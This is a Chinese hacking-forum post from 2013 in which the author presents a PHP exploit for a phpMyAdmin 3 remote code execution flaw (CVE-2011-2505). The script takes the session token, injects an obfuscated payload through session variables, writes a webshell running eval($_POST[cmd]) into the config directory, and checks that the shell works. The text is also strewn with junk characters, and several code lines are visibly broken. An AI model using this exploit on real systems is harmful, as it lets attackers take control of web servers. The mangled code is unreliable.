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phpadmin3 remote code execute php版本exploit

发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。7 A' R; Y  C8 [8 s

( ?4 m3 J. A( a: Y昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
# x$ \2 O' q6 y/ L6 H
0 R' L* k2 ^2 p  ~首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
# k+ R  s, G, d5 A) C一是session.auto_start = 1;
* ]1 g2 r2 i- u* y  x5 V) \( n二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。% z5 r5 s0 ~3 K" ?
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。% m9 q) K/ S3 a; }

  x5 `# @* h* ?, g在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。( u: \& M5 R8 L# `, H( C9 [

+ g7 ?7 `+ o5 H" _2 }% z于是写了这个php版本的exp,代码如下:
7 [, [$ c: q0 o: c$ r6 [2 Z) x) T
#!/usr/bin/php3 t( A4 R+ C& r% s" x
$ f7 p: q: g( g. Uprint_r('$ u/ Z9 ]# H: o3 H3 Y
. K9 D& Z+ N1 k" n# s" F$ B4 h+ Lpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
  P" }. x% n# [/ Z1 u4 iby oldjun(www.oldjun.com)
6 l2 E! X2 S0 u* b4 bwelcome to www.t00ls.net
* f% g8 x- K- Q/ email: oldjun@gmail.com0 t( c$ z& F% N; b
Assigned CVE id: CVE-2011-2505
) U4 k+ ^+ q0 b) c: @0 q( s& Y+---------------------------------------------------------------------------+2 S9 N% z& M* C3 G/ G" T
  ?  r. z; U6 K  Z* F3 y% x
5 \: Y3 w0 u( ?" L) s/*** k+ h- o" C& v4 d" j7 ]$ d
* working when the directory:"config" exists and is writeable./ H0 |% y% h- \- r* G
9 ~' p# r, X/ O$ Q' d2 r
$ |) Z+ H5 e" C9 I# ]; N- [3 t) t8 fif ($argc < 3) {
" C+ e! l/ g8 X; p/ ?) u1 i  h+ K0 |    print_r('' }3 k6 _4 t  {& J
; a) @( H4 w0 l4 p: R1 ?Usage: php '.$argv[0].' host path
) o( o* d5 J7 x, e$ p( whost:      target server (ip/hostname)8 @* {. I5 E0 I# }) e) K: X
path:      path to pma3
- s4 t1 m6 Y  b% G7 h( N) {1 q2 VExample:7 y) u4 z% Z8 `  {
php '.$argv[0].' localhost /pma/
+ T# t  e5 D6 v3 A" ^3 C+---------------------------------------------------------------------------+* L- R* f5 }2 x2 s$ e
');5 w% f0 q6 X4 L: h
3 Z# x2 E1 I. `4 R- N! E3 D}3 K4 r/ ]7 ~7 i
+ S4 t' k6 M) m- C6 Z" O
$host = $argv[1];* m8 O; X1 Z+ [6 c& ]
$path = $argv[2];0 l5 C' h$ V* x! c5 H  a. x$ ~

2 Y- H1 w2 N: E3 |% P5 i7 r/**6 h9 v/ c$ b4 O) m% x
* Try to determine if the directory:"config" exists( _. a2 S" B. ~$ {, c3 }/ [& A
9 G  \' g0 o# r' recho "[+] Try to determine if the directory:config exists....\n";7 D+ E: m- D/ T, R( Z$ o) e) p
$returnstr=php_request('config/');" `4 v, P5 I4 Z4 t% w
* R1 B+ Z& o$ h, l, g0 x7 A    exit("[-] Exploit Failed! The directory:config do not exists!\n");. V1 {- l" {+ N) ?
2 E! L/ Q* a2 `1 u2 M- L0 j$ b8 Q! M: Z* s8 o0 j( P2 q. b
/**  W! c) Y8 N* f5 W- W9 A6 i" m
* Try to get token and sessionid+ m/ L- ?& r5 g6 e9 E& b
) J3 ^  O+ Y6 h$ H0 Recho "[+] Try to get token and sessionid....\n";0 n2 r" T1 i  @& X
/ `: _' ?5 x# n& F. mpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);5 B4 ~$ }: _/ n3 \3 S# O
$token=$resp[3];4 U" B1 S7 L) D, a, _  n5 }" B- H
3 T- h! \% I3 Q1 F* c6 Nif($token && $sessionid){
9 Q# g2 ?: A% _9 a2 u    echo "[+] tokentoken\n";3 }+ s& B9 ^/ d
    echo "[+] Session IDsessionid\n";6 r! l+ K5 u. Z: S
( q, a; H1 h5 [  w; R    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
0 G( Z8 G4 {% n}+ r) ?! T1 r6 P% N7 r! i) l# ]0 N4 I

. s+ d( ^3 O) C( Q* h2 l- a/**! U0 ^1 x9 \1 ^; d6 F* i4 _
* Try to insert shell into session. `. a$ {) [+ D
) y6 ^9 [0 p7 t% E: v4 A  S5 Wecho "[+] Try to insert shell into session....\n";! f& v/ B; u& H- b4 N6 T
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.: k% Z9 n; Y8 N
, R( z1 C. L5 K$ P* P  r" g
/**4 Y; S. B) [" W8 |5 u
* Try to create webshell0 h: h8 E3 f$ b! v
**/7 G$ t1 U* y6 o; k+ x
echo "[+] Try to create webshell....\n";8 n0 i0 }' Y3 V7 ?( g' Q6 @
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);- x9 j3 C  L% a+ J) u; l
/**5 x2 {+ x. U+ M2 i' y! n
* Try to check if the webshell was created successfully
; u( V0 O' `  l" w/ N) H+ r$ M**/- Z3 h  ?& H# U( Z* Y0 F) X/ I
echo "[+] Try to check if the webshell was created successfully....\n";
; U& X. J7 b/ p* L$ h" e1 z$content=php_request('config/config.inc.php');- R8 s! T6 @6 B7 D+ _6 N
if(strpos($content,'t00ls')){$ F; v6 t: N& `: L$ q+ w
    echo "[+] Congratulations! Expoilt successfully....\n";# r( {) N  N3 y$ u# y2 e$ q7 \
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
4 s3 [- m5 \4 ~}else{/ ~- b. [/ ], O4 G  C8 B+ s  P
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");: z1 o/ ^- Q( M: y" H: W
  P- W+ J! t" d5 @6 c
+ r% B! l0 x1 f1 \/ l0 Efunction php_request($url,$data='',$cookie=''){0 s$ S: I- i( {' r# Q
    global  $host, $path;( {" R# P0 K4 L& w# G
    / e: R0 P4 O5 C* G( o  ~$ e
# m3 n" o. W6 E9 z3 `; `   
  [( U+ R0 W) U, \% h& r    $packet = $method." ".$path.$url." HTTP/1.1\r\n";8 I6 i0 E) K4 k3 w( `8 B7 V8 F: I" Y
    $packet .= "Accept: */*\r\n";
- g. n. i+ r* v: U% F9 R1 U$ v7 r    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
# R& e9 w  c9 e, Q: Q0 k8 b    $packet .= "Host: $host\r\n";
( R+ ^6 Q0 P- l+ F) g    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";" ?. g8 T4 D6 j. ]% A; q. s
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";5 E  r8 j' \% S  u
    $packet .= $cookie?"Cookie: $cookie\r\n":"";; `: J8 b6 I  p; [  S
    $packet .= "Connection: Close\r\n\r\n";
( _+ C& ~) {0 K4 c    $packet .= $data?$data:"";
5 J- M7 \$ {0 O
! K8 b- N; w9 _  m2 t% s8 @    $fp = fsockopen(gethostbyname($host), 80);
' Z  w8 l8 i5 n4 T/ |  w) |    if (!$fp) {
8 \3 T1 i( ~& B9 x7 P    echo 'No response from '.$host; die;
- k  B/ x5 B) o3 A: F' C    }
2 Q$ s0 H4 N. n2 h' G    fputs($fp, $packet);
: j$ S5 E2 E9 c' O7 z
' J4 ]6 X" H+ {4 d" q    $resp = '';
. ?  _5 \+ C3 e7 O$ D; k( r1 x& d  g( k  c9 |1 K
    while ($fp && !feof($fp))+ r9 e9 K$ S% {: F' C
        $resp .= fread($fp, 1024);
1 @4 t3 Z* G. Z6 k" L& j9 ~) P- z4 i# p( j7 _) H, a3 G
    return $resp;
* `: I& y. Y+ n3 F( @  h9 P- Y}
# m; X/ z0 J" x6 q   
- }& j8 g7 }0 B3 o?>
4 S5 B) Z8 f4 s: I4 o.

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